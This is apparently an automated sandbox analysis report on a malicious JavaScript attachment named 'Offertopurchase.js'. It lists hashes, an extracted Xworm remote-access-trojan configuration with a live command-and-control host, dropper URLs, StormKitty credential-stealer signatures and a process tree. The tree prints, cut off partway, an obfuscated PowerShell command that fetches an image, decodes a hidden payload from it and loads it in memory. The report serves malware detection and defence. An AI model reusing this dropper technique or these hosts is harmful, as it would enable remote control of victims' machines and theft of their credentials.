Analysis

  • max time kernel
    124s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    07-08-2024 06:48

General

  • Target

    Offertopurchase.js

  • Size

    329KB

  • MD5

    b4105714b83cef4f0d8d859364cd6322

  • SHA1

    448f53b0c979beb7305db50a282bef00043e6840

  • SHA256

    f7012ceb3f5f17167f1b0eb83dc97b3064ea92dc81d1151a2218112895142afd

  • SHA512

    91a19c5e098351e053de13d4c8ebe3677f2fec4aac7a63169a30ea147c75b0ce734e11011724ff6d7be7e7b2311ce9663ef9b6c52f2172febaca2c2f7cb03f0a

  • SSDEEP

    768:P7rCumqiWTinPK6eOK6mW3XKqe+KqmG9NqaeOqamWX3qKuH+qKmGxBK6eOK6mW3G:rdvJ5strohpUtg1vx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Extracted

Family

xworm

Version

5.0

C2

christyrusike21.duckdns.org:7000

Mutex

znkTtudE0WUuGVBW

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell with its display window hidden.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Offertopurchase.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´YQBn䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´VQBy䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´JwBo䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bw䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´Og䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´aQBh䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´x䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´dQBz䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´YQBy䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´HY䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´cgBn䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´MQ䷡ ㌝ ₋ ⊩ ´w䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´aQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQBz䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bo䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´bwB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´Xw䷡ ㌝ ₋ ⊩ ´y䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Nw䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQBh䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´Bu䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´agBw䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´dwBl䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´QwBs䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´ZQBu䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´TgBl䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´LQBP䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´agBl䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´TgBl䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´LgBX䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´YgBD䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´aQBl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´aQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´ZwBl䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´eQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cw䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´ZQBi䷡ ㌝ ₋ ⊩ ´EM䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgB0䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´R䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´bgBs䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´YQBk䷡ ㌝ ₋ ⊩ ´EQ䷡ ㌝ ₋ ⊩ ´YQB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´K䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bQBh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQBV䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´YQBn䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´V䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ 
´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´V䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´EU䷡ ㌝ ₋ ⊩ ´bgBj䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´ZwBd䷡ ㌝ ₋ ⊩ ´Do䷡ ㌝ ₋ ⊩ ´OgBV䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´Rg䷡ ㌝ ₋ ⊩ ´4䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´RwBl䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´UwB0䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´aQBu䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´K䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bQBh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQBC䷡ ㌝ ₋ ⊩ ´Hk䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´KQ䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´8䷡ ㌝ ₋ ⊩ ´Dw䷡ ㌝ ₋ ⊩ ´QgBB䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´RQ䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´DQ䷡ ㌝ ₋ ⊩ ´XwBT䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´QQBS䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´Pg䷡ ㌝ ₋ ⊩ ´+䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´8䷡ ㌝ ₋ ⊩ ´Dw䷡ ㌝ ₋ ⊩ ´QgBB䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´RQ䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´DQ䷡ ㌝ ₋ ⊩ ´XwBF䷡ ㌝ ₋ ⊩ ´E4䷡ ㌝ ₋ ⊩ ´R䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´+䷡ ㌝ ₋ ⊩ ´D4䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bQBh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQBU䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´B0䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´SQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´E8䷡ ㌝ ₋ ⊩ ´Zg䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´KQ䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´ZQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´SQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´aQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´ZwBl䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´LgBJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´TwBm䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´BG䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´YQBn䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´BJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ 
´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´BJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cs䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´EY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Gc䷡ ㌝ ₋ ⊩ ´LgBM䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgBn䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´7䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´YgBh䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´DQ䷡ ㌝ ₋ ⊩ ´T䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´ZwB0䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´BJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Hg䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´YQBy䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´SQBu䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cwBl䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´BD䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´aQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´ZwBl䷡ ㌝ ₋ ⊩ ´FQ䷡ ㌝ ₋ ⊩ ´ZQB4䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´LgBT䷡ ㌝ ₋ ⊩ ´HU䷡ ㌝ ₋ ⊩ ´YgBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´cgBp䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´Zw䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´cwB0䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cgB0䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´s䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cwBl䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´BM䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bgBn䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bj䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´eQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cw䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ 
´QwBv䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´dgBl䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bd䷡ ㌝ ₋ ⊩ ´Do䷡ ㌝ ₋ ⊩ ´OgBG䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´bwBt䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´YQBz䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´Ng䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´By䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bgBn䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´cwBl䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´BD䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´bwBh䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´ZQBk䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´cwBz䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQBi䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´eQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´D0䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´FM䷡ ㌝ ₋ ⊩ ´eQBz䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´UgBl䷡ ㌝ ₋ ⊩ ´GY䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bg䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´cwBz䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQBi䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ 